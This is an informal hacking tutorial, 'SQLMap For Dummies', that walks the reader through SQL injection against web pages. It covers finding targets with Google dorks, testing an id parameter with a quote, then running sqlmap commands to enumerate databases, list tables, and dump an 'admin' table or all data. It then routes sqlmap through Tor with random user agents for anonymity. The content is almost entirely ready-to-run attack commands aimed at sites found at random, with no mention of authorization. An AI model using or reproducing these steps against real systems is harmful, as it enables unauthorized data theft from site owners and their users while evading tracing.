SQLMap For Dummies v 1.0 by Matrix

1. SQLMAP For Dummies v1.0
2. By Matrix
3. http://www.twitter.com/TheAnonMatrix
4.  
5. Required for use: Backtrack5 R1.
6.  
7. Start your Backtrack5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.
8. Now lets get started!
9. First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:
10.  
11. http://localhost.com/index.php?id=1337'
12. Notice the ' here: ^
13.  
14. This should give you a pretty error and a good start!
15. Lets open sqlmap!
16. So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:
17.  
18. python sqlmap.py -u <website>
19.  
20. With a website we would simply do it like this
21.  
22. python sqlmap.py -u http://localhost/index.php?id=1337
23. (note we did not add the ' here)
24.  
25. -u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:
26. (note the following options use double dashes)
27.  
28. --dbs to find DataBases
29. --users to find users.
30.  
31. python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users
32. (for the sake of lenght we will be assuming you used --dbs in this tutorial)
33.  
34. After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!
35. Should look like this:
36.  
37. available databases [2]:
38. [*] database1
39. [*] database2
40.  
41. Now to the fun part!
42.  
43. python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1
44.  
45. This tells the program to find tables (--tables) in database (-D) names: database1.
46. Once you execute this you will find (maybe) tons of tables. Locate the one you want...lets call it admin!
47.  
48. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin
49.  
50. Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all.
51. Examples:
52.  
53. python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all
54.  
55. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump
56.  
57. --dump dumps the selected tables content, --dump-all dumps EVERYTHING!
58. But, we should be secure?
59.  
60. Tor with SQLMAP:
61.  
62. First find /etc/apt/sources.list open it and add
63.  
64. deb http://deb.torproject.org/torproject.org lucid main
65.  
66. Open the terminal and use this commandoes:
67.  
68. gpg --keyserver keys.gnupg.net --recv 886DDD89
69. gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
70.  
71. And now we need more commandos ran as root:
72.  
73. apt-get update apt-get install tor tor-geoipdb apt-get install polipo
74.  
75. Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
76.  
77. Go to /etc/polipoconfig and replce the file with the one above. restart polipo: /etc/init.d/polipo restart
78. Congratz! now you can run sqlmap with TOR!
79.  
80. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent
81.  
82. Happy safe hacking!
83.  
84. Source:
85. http://www.coresec.org/2011/04/24/sqlmap-with-tor/
86. https://www.torproject.org/docs/debian.html.en#ubuntu